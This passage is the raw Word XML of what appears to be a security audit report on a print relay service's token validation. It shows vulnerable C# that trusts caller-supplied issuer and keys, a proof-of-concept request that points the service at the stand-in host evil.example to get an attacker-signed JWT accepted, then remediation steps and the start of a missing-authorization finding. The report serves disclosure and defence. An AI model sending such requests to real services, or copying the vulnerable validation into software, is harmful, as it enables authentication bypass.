          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ValidateAudience         = true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33316A96" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ValidAudience            = clientSecretJwt,       // attacker-supplied header value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D2D476" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ValidateIssuer           = true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782D6FC8" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ValidIssuer              = config.Issuer,         // from the attacker’s discovery doc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02263F5A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ValidateIssuerSigningKey = true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1058FE32" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    IssuerSigningKeys        = config.SigningKeys,    // from the attacker’s JWKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411C74DF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ValidateLifetime         = true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBC5C09" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ClockSkew                = TimeSpan.Zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0423BAFC" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C916CF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>new JwtSecurityTokenHandler().ValidateToken(accessToken, tvp, out SecurityToken validated);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627CE50E" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>return validated != null;                            // valid: attacker-signed token accepted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C2C77" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF2BE08" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Proof-of-concept request (any non-“okta” URL routes to the B2C branch; the JWT is signed by the attacker and validates against the attacker’s own published keys):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5770E27E" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20ADCE59" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>POST /printers/print/pdfWithCopies HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D1E640" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Host: 127.0.0.1:&lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B0EBF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F1ABFF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-ProviderValidationUrl: https://evil.example/.well-known/openid-configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76604427" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-AccessToken: &lt;JWT signed by attacker; iss matches discovery doc, aud=foo, valid exp&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6623895F" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-ClientSecretJwt: foo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C59EF6E" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-Document-Name: poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21433AB6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B301363" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{ "Base64Content": "&lt;base64 PDF&gt;", "PrintDocType": "&lt;mapped doc type&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E648A70" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "PrinterSettings": { "Copies": 1 } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221FE3D9" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C74CABB" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67924C09" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Goal: anchor B2C/OIDC trust to one fixed, company-controlled identity provider. Remediate together with Finding 1 so a single validation path protects every endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727BE8E2" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 1. Pin the OIDC authority server-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A20A5C" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Configure the authority, issuer, JWKS URI, and expected audience from fixed server-side settings tied to your known B2C tenant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61742065" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Remove all code that reads the discovery URL, issuer, keys, or audience from request headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0BACA4" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>appsettings.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "AzureAdB2C": {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "Authority": "https://YOURTENANT.b2clogin.com/YOURTENANT.onmicrosoft.com/B2C_1_signin/v2.0",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "Audience": "api://print-relay"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEAE346" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 2. Use the framework OIDC validator, not a hand-rolled one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771DCA25" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Let the authentication middleware fetch and cache the signing keys from the pinned authority and validate tokens automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE0E5DA" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>services.AddAuthentication(JwtBearerDefaults.AuthenticationScheme)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    .AddJwtBearer(o =&gt; {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        o.Authority = cfg["AzureAdB2C:Authority"];   // keys fetched from here only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        o.Audience  = cfg["AzureAdB2C:Audience"];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        o.TokenValidationParameters.ValidateLifetime = true;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADEB223" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 3. Set a fixed expected audience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64CFAA" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Validate the token aud claim against the relay’s own registered identifier — never a value supplied by the caller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F9CC7" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 4. Adopt deny-by-default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AE470D" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Both branches of the old isUserTokenValid trusted a caller-controlled URL; ensure the single corrected path rejects anything it cannot positively validate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE87F83" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9F7EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">✔ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verify: (1) a self-signed token with an attacker-hosted discovery/JWKS URL is rejected; (2) a token with the wrong audience is rejected; (3) a valid B2C token is accepted on every protected endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E708A80" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="5E7E1608" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26202054" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-287: Improper Authentication — cwe.mitre.org/data/definitions/287.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3984EDD0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-290: Authentication Bypass by Spoofing — cwe.mitre.org/data/definitions/290.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA4205A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-347: Improper Verification of Cryptographic Signature — cwe.mitre.org/data/definitions/347.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2279E3BB" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP Top 10 2021 A07: Identification and Authentication Failures — owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392237E7" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD3EAF7" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="399AC74E" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541635B6" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA88006" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5C0A08" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F45C99B" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2914A1" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E74655" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D5D61C" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8ACDCB" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C5089E" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B4CFBC" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B522CB" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7F1611" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD67AD9" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C16C360" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76C856F3" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5423CF" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>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46048A01" w14:textId="77777777" w:rsidTr="002048E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70C770E2" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="_Toc9000002"/>
            <w:bookmarkStart w:id="9" w:name="_Toc232079912"/>
            <w:r>
              <w:t>3. Missing Authorization on the PrintPdf Endpoint - High</w:t>
            </w:r>
            <w:bookmarkEnd w:id="8"/>
            <w:bookmarkEnd w:id="9"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E427162"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="372F1431" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24266EC0"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High</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  CVSS 3.1: 7.1 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71737225" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Affected component: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PrintController.PrintPdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>POST /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>printers/{printDocType}/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>print/pdf</w:t>
      </w:r>
    </w:p>
